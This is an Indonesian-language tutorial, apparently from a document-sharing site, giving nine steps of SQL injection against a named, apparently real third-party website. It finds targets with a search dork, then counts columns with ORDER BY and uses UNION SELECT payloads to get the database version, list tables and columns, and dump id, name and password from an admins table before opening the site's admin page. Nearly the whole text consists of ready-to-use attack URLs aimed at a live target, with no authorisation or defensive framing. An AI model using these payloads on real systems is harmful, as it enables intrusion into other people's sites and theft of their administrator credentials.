Anda di halaman 1dari 1

Langkah - Langkah :

1. mencari web yang rentan SQLi ( ada bug sqlinjection ) dengan sebuah dork, con
tohnya ada banyak kita ambil satu yaitu inurl:show_content.php?id=, setelah dapa
t website tersebut cek http://www.gaiascience.com.my/show_content.php?id=41
2. cek error dengan http://www.gaiascience.com.my/show_content.php?id=41'
3. cek jumlah tabel di database dengan http://www.gaiascience.com.my/show_conten
t.php?id=41 order by 1-- s/d 10
4. masukkan fungsi union select pertama sql - union select statement lalu http:/
/www.gaiascience.com.my/show_content.php?id=-41 UNION SELECT 1,2,3,4,5,6,7,8,9--
5. cari versi sql yang digunakan web dengan cara www.gaiascience.com.my/show_con
tent.php?id=-41 UNION SELECT 1,2,3,@@version,5,6,7,8,9--
6. cari nama tabel yang ada di database www.gaiascience.com.my/show_content.php?
id=-41 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9 from information_sc
hema.tables where table_schema=database()--
7. cari nama coloumn yang terdapat nama user / password dengan membuat mysql_Cha
r() www.gaiascience.com.my/show_content.php?id=-41 UNION SELECT 1,2,3,group_conc
at(column_name),5,6,7,8,9 from information_schema.columns where table_name=CHAR(
97, 100, 109, 105, 110, 115)--
8. cari nama dari id, name, dan pass dengan cara www.gaiascience.com.my/show_con
tent.php?id=-41 UNION SELECT 1,2,3,group_concat(id,0x3a,name,0x3a,pass),5,6,7,8,
9 from admins--
disitu ada tanda " 0x3a" maksudnya adalah bentuk HEX dari tanda " : " sehingga d
ata nanti dipisah dengan tanda " : ".
9. buka http://www.gaiascience.com.my/admin/

Anda mungkin juga menyukai